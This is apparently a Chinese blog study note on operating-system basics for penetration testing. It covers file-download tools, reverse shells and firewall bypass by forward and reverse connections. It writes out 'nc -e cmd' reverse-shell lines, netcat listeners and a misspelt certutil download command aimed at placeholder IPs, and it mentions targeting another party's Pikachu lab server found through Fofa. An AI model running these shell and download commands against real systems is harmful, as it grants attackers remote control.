操作系统_名词_文件下载_反弹SHELL_防火墙绕过

操作系统

操作系统-用途&命令&权限&用户&防火墙

1、个人计算机&服务器用机

2、windows&Linux常见命令

3、文件权限&服务权限&用户权限

4、系统用户&用户组&服务用户等分类

5、自带防火墙出站&入站规则策略协议

实用案例1:文件上传下载-解决无图形化&解决数据传输

Linux:wget curl python ruby perl java等

Windows: Powershell Certutil Bitsadmin msiexec mshta rundll32等

实用案例2:反弹Shell命令-解决数据回显&解决数据通讯(反弹就是将权限给别人)

useradd passwd

测试Linux系统添加用户或修改命令交互回显

结合案例1:防火墙绕过-正向链接&反向链接&内网服务器

1、内网:

内网->用户

nc -e cmd ip地址 端口

就是把本机的cmd权限给这个ip的窗口

nc -lvvp 监听的端口号

2.防火墙

服务器主机<->另一个服务器主机

如果开了防火墙,是不行的

入站严格出站宽松

nc -e cmd ip地址 端口(就是正向链接)

主动把权限给出去

反向链接就是别人找你

结合案例-Fofa拿下同行Pikachu服务器

文件下载&反弹shell:

certuil -urlcache -split -f ip地址

nc -e cmd ip地址

找个在线的靶场

相关推荐
Nan_Shu_6145 分钟前
学习: 尚硅谷Java项目之尚庭公寓(2)
学习
好奇龙猫27 分钟前
【人工智能学习-AI入试相关题目练习-第九次】
人工智能·学习
zhangrelay1 小时前
影响移动固态磁盘稳定性的原因有哪些呢?
笔记·学习
棒棒的皮皮2 小时前
【深度学习】YOLO学习教程汇总
深度学习·学习·yolo·计算机视觉
詩不诉卿2 小时前
Zephyr学习之spi flash驱动记录(w25q128)
学习
yanyu-yaya2 小时前
速学兼复习之vue3章节3
前端·javascript·vue.js·学习·前端框架
沉默-_-3 小时前
微信小程序网络请求 wx.request 详解
网络·学习·微信小程序·小程序
嗯嗯=3 小时前
STM32单片机学习篇5
stm32·单片机·学习
头疼的程序员4 小时前
计算机网络:自顶向下方法(第七版)第二章 学习分享(二)
学习·计算机网络
沉默-_-5 小时前
微信小程序页面配置详解
学习·微信小程序·apache·微信开发者工具